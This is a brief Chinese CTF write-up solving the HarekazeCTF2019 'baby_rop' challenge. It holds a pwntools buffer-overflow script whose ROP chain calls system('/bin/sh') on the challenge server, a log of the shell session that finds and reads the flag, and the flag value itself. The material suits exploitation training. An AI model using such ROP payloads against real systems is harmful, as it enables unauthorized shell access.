![CTF buuoj pwn-----[HarekazeCTF2019]baby](http://www.mshxw.com/aiimages/31/322029.png "CTF buuoj pwn-----[HarekazeCTF2019]baby")
- 1. 分析
- 2. 编写exp
- 3. 运行exp,获取flag
shift+f12 ,有system 有bin/sh ,64位,直接调用system就行
果真babyrop
from pwn import *
sh = remote('node4.buuoj.cn', 26517)
bin_sh_addr = 0x601048
system_addr = 0x400490
pop_rdi_addr = 0x400683
payload = b'a'*0x10 + b'a'*8 + p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(system_addr)
sh.sendline(payload)
sh.interactive()
3. 运行exp,获取flag
flag 不在根目录下,find 查找到z在./home/babyrop/flag
bing@bing-virtual-machine:~$ python3 ./[HarekazeCTF2019]baby_rop.py
[+] Opening connection to node4.buuoj.cn on port 26517: Done
[*] Switching to interactive mode
What's your name?
$ find -name flag
./home/babyrop/flag
find: './proc/tty/driver': Permission denied
find: './proc/1/task/1/fd': Permission denied
find: './proc/1/task/1/fdinfo': Permission denied
find: './proc/1/task/1/ns': Permission denied
find: './proc/1/fd': Permission denied
find: './proc/1/map_files': Permission denied
find: './proc/1/fdinfo': Permission denied
find: './proc/1/ns': Permission denied
find: './proc/7/task/7/fd': Permission denied
find: './proc/7/task/7/fdinfo': Permission denied
find: './proc/7/task/7/ns': Permission denied
find: './proc/7/fd': Permission denied
find: './proc/7/map_files': Permission denied
find: './proc/7/fdinfo': Permission denied
find: './proc/7/ns': Permission denied
find: './root': Permission denied
$ cat ./home/babyrop/flag
flag{60b6bc83-bfa5-463a-9bd4-05b9261703d9}
flag{60b6bc83-bfa5-463a-9bd4-05b9261703d9}
